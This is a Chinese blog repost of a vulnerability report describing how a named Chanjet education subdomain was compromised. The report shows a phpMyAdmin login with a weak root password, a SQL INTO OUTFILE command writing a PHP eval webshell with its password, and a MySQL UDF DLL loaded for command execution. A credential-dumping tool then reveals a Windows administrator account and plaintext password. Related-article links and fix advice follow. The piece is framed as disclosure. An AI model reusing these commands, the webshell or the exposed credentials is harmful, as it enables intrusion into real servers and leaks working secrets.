upupw php 漏洞,畅捷通某分站phpmyadmin的弱口令导致服务器沦陷

最新推荐文章于 2024-04-11 14:57:37 发布
最新推荐文章于 2024-04-11 14:57:37 发布
阅读量1.4k 收藏
点赞数
文章标签: upupw php 漏洞

http://edu.chanjet.com/phpmyadmin/

然后根目录还有http://edu.chanjet.com/a.php 估计是测试文件,查看phpinfo信息的

正好我们能找到路径 省得爆路径了

imgpxy.php?url=gpj.097551532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

首先 phpmyadmin的弱口令

root chanjet

顺利登陆

imgpxy.php?url=gpj.466861532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

然后结合路径D:\upupw\htdocs\

来写文件到网站下

select 'wooyun Martial' into outfile 'D:\\upupw\\htdocs\\1.txt';

我们来访问http://edu.chanjet.com/1.txt

写入成功

imgpxy.php?url=gpj.487271532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

然后我们写个一句话

select '<?php @eval($_POST[august])?>' into outfile 'D:\\upupw\\htdocs\\martial.php';

菜刀连接之

http://edu.chanjet.com/martial.php密码august

imgpxy.php?url=gpj.711881532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

既然有root了 高版本mysql 就找下目录

select @@basedir

然后加载mysqlDll.dll到D:\xampp\mysql\lib\plugin\下面

OK 可以执行命令了

imgpxy.php?url=gpj.456991532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

本来想加个账户结束的 结果还搞这个

密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历史的要求。

好吧 祭出神器 直接拿下管理账号

getpass.exe>august.txt

* User: Administrat0r

* Domain: COLLEGE2

* Password: ufsoft!123

由于是内网 我就不转发了

到这里 服务器就彻底沦陷了 我就不进行内网渗透了 如果官方有想法的话

我可以继续帮你们检测 现在就先到这里了 = =漏洞证明:

imgpxy.php?url=gpj.353602532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

imgpxy.php?url=gpj.549212532102904102%2F9041_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

修复方案:

1.先改个复杂的root密码

2.删掉a.php和我传的一些东西

我总结下我都传了什么 D:\upupw\PHP5\august.txt、D:\upupw\htdocs\martial.php、D:\xampp\mysql\lib\plugin\mypluglib.dll、D:\upupw\PHP5\GetPassword_x64.exe、D:\upupw\htdocs\new\app\exam\tpls\app\cood.php 大概就这么多了

你们更专业~~

weixin_39949607
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
软件测试二十六阶段(渗透测试)
qiuzemiao1的博客
08-08 1515
渗透测试
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 2万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
漏洞复现】用友捷通CRM create_site.php SQL 注入漏洞
最新发布
qq_34780861的博客
04-11 199
捷通CRM系统create_site.php存在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。
upupw ap切换php,upupw套件(php7.0+a+m)windows环境下搭建YII框架
weixin_36027743的博客
03-11 219
1、下载YII框架,http://www.yiichina.com/download 2、下载好后解压如图,复制红色框到项目文件夹 这个只是看一下当下开发环境是不是满足YII基本要求,我的警告人为忽略不见4、win+X,选择管理员运行(个人习惯,防止普通管理员没有权限), 找到项目文件,如我的在D盘,C:\Windows\system32>D:D:\>cd web_test\frame...
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1276
phpmyadmin弱口令至getshell 漏洞复现
记一次phpMyAdmin弱口令爆破事件应急响应
Boom!脑洞大爆炸的博客
06-27 936
记一次phpMyAdmin弱口令爆破事件应急响应
Apache版UPUPW PHP5.5系列环境包1503(64位)
11-27
特别说明1: PHP官方从PHP5.5开始就不再支持Windows XP和2003,这些系统已经有十年的历史,所以PHP5.5将不再提供支持。 特别说明2: UPUPW APACHE版PHP5.5系列采用Apache+PHP+MariaDB的架构搭建,Ma
服务器全能环境UPUPW ANK 32位版 v1.1.4
12-16
柚皮Windows服务器集成环境智控平台(以下简称UPUPW),主要用于一键部署全能网站运行环境,适用服务器生产环境和本地开发环境。UPUPW控制面板集成网站运行环境所需功能,简单几步即
服务器全能环境UPUPW ANK 64位版 v1.1.7
11-06
PHP / JAVA / ASP / ASP.NET 尊享愉悦的建站体验! 柚皮Windows服务器集成环境智控平台(以下简称UPUPW),主要用于一键部署全能网站运行环境,适用服务器生产环境和本地开发环境。 UPUPW控制
Apache版UPUPW PHP5.6系列环境包1510(64位)
11-27
特别说明: UPUPW APACHE版PHP5.6系列采用Apache+PHP+MariaDB的架构搭建,MariaDB和MySQL完全兼容使用方法一致省内存性能佳。如想更改搭配可以使用UPUPW绿色服务器平台组件扩展包http://www.upupw.n
Apache版UPUPW PHP5.5系列环境包1510
11-27
特别说明: UPUPW APACHE版PHP5.5系列采用Apache+PHP+MariaDB的架构搭建,MariaDB和MySQL完全兼容使用方法一致省内存性能佳。如想更改搭配可以使用UPUPW绿色服务器平台组件扩展包http://www.upupw.n
UPUPW PHP探针安全版 19.08.06
05-01
UPUPW PHP探针安全版防服务器路径信息泄露,防XSS漏洞攻击,支持最新PHP7系列版本,完全兼容PHP5.x-PHP7.x组件和参数的检测。UPUPW PHP探针安全版 19.08.06 更新日志:1.新增FTP组件检测并在php5和php7中智能切换成对应组件;2.修复mbstring和mcrypt组件检测在php5和php7上的兼容性;3.修复界面布局在路径字符串多的情况下不整齐的问题;4.隐藏服务器端口在数据测试连接成功后显示。
upupw使用说明
08-04
最直白的UPUPW使用说明,帮助新手使用upupw,快速搭建web环境
UPUPW PHP探针通用版 v15.12.3.zip
07-06
UPUPW PHP探针通用版简介 UPUPW PHP探针通用版,优势:支持最新PHP7.0系列版本,完全兼容PHP5.2-PHP5.6组件和参数的检测,防XSS漏洞攻击。 UPUPW PHP探针通用版功能列表: 01、支持服务器域名及端口检测。 02、支持服务器环境webserver检测。 03、支持php版本检测。 04、支持php配置文件路径检测。 05、支持当前网站路径检测。 06、支持服务器时间检测。 07、支持查看phpinfo详细页面。 08、支持php常规组件MySQLi、cURL、GD、EXIF、OpenSSL、Mcrypt、IMAP、SendMail开启状态检测。 09、支持PHP Zend解密组件Zend Optimizer、Zend GuardLoader、ionCubeLoader开启状态检测。 10、支持PHP 缓存优化组件XCache、OPcache、Memcache开启状态检测。 11、支持PHP重要参数Memory限制、Upload限制、POST限制、Execution超时、Input超时、Socket超时检测。 12、支持PHP全部已编译模块组件显示。 13、支持数据库连接测试。 14、支持页面执行时间和消耗内存的检测。 UPUPW PHP探针通用版页面展示 相关阅读 同类推荐:站长常用源码
UPUPW PHP探针安全版 v15.12.5.zip
07-06
UPUPW PHP探针安全版简介 UPUPW PHP探针安全版,防服务器路径信息泄露,防XSS漏洞攻击,支持最新PHP7.0系列版本,完全兼容PHP5.2-PHP5.6组件和参数的检测。 UPUPW PHP探针安全版 15.12.5 更新日志: 1、修复安全版---数据库连接处如果被外部工具激活input输入框,可用任意数据库地址模拟测试连接数据库成功,进而来显示隐藏的配置和站点路径。 UPUPW PHP探针安全版页面展示 相关阅读 同类推荐:站长常用源码
45.网络安全渗透测试—[穷举篇8]—[phpMyAdmin登录弱口令穷举]
qwsn
01-12 4096
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、phpMyAdmin登录弱口令 1、两个工具: 2、示例:
windows平台建站套件upupw,访问/info目录的资源403错误问题解决
caihexi
08-16 908
原先,我们的windows服务器上使用的是PHPNOW这个套件。后来被漏洞扫描出了很多的漏洞phpnow 早就不更新了。为了解决这个问题,从网上找到了upupw这个套件。这个套件更新得挺及时的,而且还有很多的版本可供选择。因此选择了一个与我们服务器最适合的版本。装到测试机上后,再扫描一下,果然解决了全部的高威漏洞。 2016.8.13,我将主服务器上的套件改为了UPUPW,当时还是比较顺利...
php弱口令总结,web漏洞弱口令
weixin_35259908的博客
03-27 1497
前言:将web漏洞中万能密码也归类于弱口令篇。1.phpmyadminphpmyadmin万能密码其实应该叫phpmyadmin万能账号,因为是在帐号处输入漏洞信息,而密码不需要输入用户名处写入'localhost'@'@"则登录成功,密码无需输入 (全部为英文标点符号)phpmyadmin 爆绝对路径phpMyAdmin/libraries/select_lang.lib.phpphpMyAdm...
upupw nginx PHP5.6使用教程
06-08
好的,下面是upupw集成环境的使用教程: 1. 首先下载upupw集成环境,可以在官网上下载最新版本:http://www.upupw.net/ 2. 安装upupw,双击运行下载好的安装文件,按照提示进行安装。 3. 启动upupw,打开upupw安装目录下的“upupw.exe”,点击“启动”按钮即可启动upupw服务。 4. 配置upupw,点击“配置”按钮,进入配置界面,可以进行一些基本配置,如端口号、虚拟主机、PHP版本等。 5. 配置虚拟主机,点击“虚拟主机”按钮,进入虚拟主机管理界面,点击“添加”按钮,填写域名、目录等信息即可添加虚拟主机。 6. 安装PHP扩展,upupw内置了PHP5.6版本,如果需要安装扩展,可以在upupw安装目录下的“php”文件夹中找到“php.ini”文件,打开后找到“;extension=xxx.dll”这一行,去掉前面的分号并填写相应的扩展文件名即可安装。 7. 测试PHP环境,将PHP文件放置到虚拟主机目录下,使用浏览器访问即可测试PHP环境是否正常。 希望以上的教程对你有所帮助!如果还有其他问题,可以随时提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值